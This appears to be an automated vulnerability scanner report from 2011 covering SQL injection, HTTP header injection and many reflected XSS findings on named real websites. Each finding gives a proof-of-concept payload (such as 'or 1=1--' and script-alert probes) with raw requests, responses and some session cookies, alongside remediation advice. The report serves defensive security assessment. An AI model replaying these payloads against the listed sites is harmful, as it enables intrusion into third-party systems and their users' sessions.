SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://www.cvtelecom.cv/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.cvtelecom.cv
Path: /
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20242989%20or%201%3d1--%20 and 20242989%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?120242989%20or%201%3d1--%20=1 HTTP/1.1
Host: www.cvtelecom.cv
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=pl2aq2cevdnsrm7538jfmi53u4; path=/; domain=.cvtelecom.cv
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:17:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25423
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The value of REST URL parameter 1 is copied into the Location response header. The payload dc131%0d%0a03859863396 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb330"><script>alert(1)</script>c8f40f3c5bb was submitted in the ids parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=20468cb330"><script>alert(1)</script>c8f40f3c5bb HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.ligatus.com
Path: /timeout.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ee8"><script>alert(1)</script>10488149e13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=2/18ee8"><script>alert(1)</script>10488149e130468 HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c6f80<script>alert(1)</script>ee62fdbac8 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c28e6<script>alert(1)</script>0baf0e78e5e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload d0ec8<script>alert(1)</script>0c3f4987c6a was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 47c0e<script>alert(1)</script>05723e98a27 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a41fb<script>alert(1)</script>adc6871f1d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cfc0e<script>alert(1)</script>4318a75fb08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ade5c<script>alert(1)</script>67b2701a442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsade5c<script>alert(1)</script>67b2701a442/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:16:39 GMT
Content-Length: 569
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 407ec<a>caf30e524a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js/chatcisp1407ec<a>caf30e524a5/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:16:41 GMT
Content-Length: 551
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47b9a<script>alert(1)</script>c2f4fa10813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 393de<a>8964a54983f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 335fa<script>alert(1)</script>14eac9dc13f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/j2global/mbox/standard?mboxHost=www.new.onebox.com&mboxSession=1305465387100-728648&mboxPage=1305465831614-198194&screenHeight=1200&screenWidth=1920&browserWidth=1020&browserHeight=945&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=OBR_New_Pricing335fa<script>alert(1)</script>14eac9dc13f&mboxId=0&mboxTime=1305447831706&mboxURL=http%3A%2F%2Fwww.new.onebox.com%2Fpricing-receptionist&mboxReferrer=http%3A%2F%2Fwww.new.onebox.com%2Fhome&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.new.onebox.com/pricing-receptionist
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 211
Date: Sun, 15 May 2011 13:25:44 GMT
Server: Test & Target
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload c9469<script>alert(1)</script>497805b5141 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 15 May 2011 13:19:09 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 16 May 2011 13:19:09 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 15 May 2011 13:19:09 GMT
Content-Length: 128

/*
 * JavaScript include error:
 * The customer code "H05525C9469<SCRIPT>ALERT(1)</SCRIPT>497805B5141" was not recognized.
 */
3.15. http://mods4rides.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mods4rides.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb6e"><script>alert(1)</script>40d92ee4d7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7bb6e\"><script>alert(1)</script>40d92ee4d7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7bb6e"><script>alert(1)</script>40d92ee4d7c=1 HTTP/1.1
Host: mods4rides.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43691
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the extra_url_query_string request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af9f"><script>alert(1)</script>72a5800a358 was submitted in the extra_url_query_string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /offers/23073174/share?extra_url_query_string=706c69643d3832343134313339395af9f"><script>alert(1)</script>72a5800a358 HTTP/1.1
Host: onebox.extole.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _dominus_pid%3A23073174=BAgiDjgyNDE0MTM5OQ%3D%3D--8e2b080a34253b88d9d0fc37d226375f2d43d303; _dominus_token=1a1831e3bdc5a45c926fca7607d04f8af00dd39c
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3 was submitted in the name parameter. This input was echoed as 198d5<x style=x:expression(alert(1))>5b0a294aec3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /serve/fb/pdc?cat=&name=landing198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3&sid=1888 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.new.onebox.com/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dab5'-alert(1)-'2e2335fcaa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the back request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96dac'-alert(1)-'4e13140a073 was submitted in the back parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:01 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php?back=order.php?step=196dac'-alert(1)-'4e13140a073', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.20. https://shop.widevoip.com/authentication.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://shop.widevoip.com
Path: /authentication.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a809e'-alert(1)-'0dd4573b18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dbef'-alert(1)-'5b40c63d92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f6d'-alert(1)-'bb10e0eb6e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbfc3'-alert(1)-'69ac8c7469c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df848'-alert(1)-'1e48a97705d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d865'-alert(1)-'3fd3c2efa9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.php/index.php8d865'-alert(1)-'3fd3c2efa9b', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.26. https://shop.widevoip.com/index.php/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://shop.widevoip.com
Path: /index.php/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51537'-alert(1)-'10e189e9a5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da4c'-alert(1)-'03985f41b86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f822'-alert(1)-'980798d9648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4da3'-alert(1)-'3d4cd63b528 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ebf3'-alert(1)-'989b9edb336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:33:01 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php6ebf3'-alert(1)-'989b9edb336?step=1', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.31. https://shop.widevoip.com/order.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://shop.widevoip.com
Path: /order.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fba44'-alert(1)-'92ed8ffb93c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the step request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3564'-alert(1)-'7235c17c5e2 was submitted in the step parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd069'-alert(1)-'38a4fe86abd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:30:56 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.phpbd069'-alert(1)-'38a4fe86abd', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.34. https://shop.widevoip.com/prices-drop.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://shop.widevoip.com
Path: /prices-drop.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85341'-alert(1)-'2eed22d8f74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:22 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 42878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP - Promotions</titl ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.php?85341'-alert(1)-'2eed22d8f74=1', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.35. http://shops.oscommerce.com/live_shops_frameset_header.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shops.oscommerce.com
Path: /live_shops_frameset_header.php
Issue detail
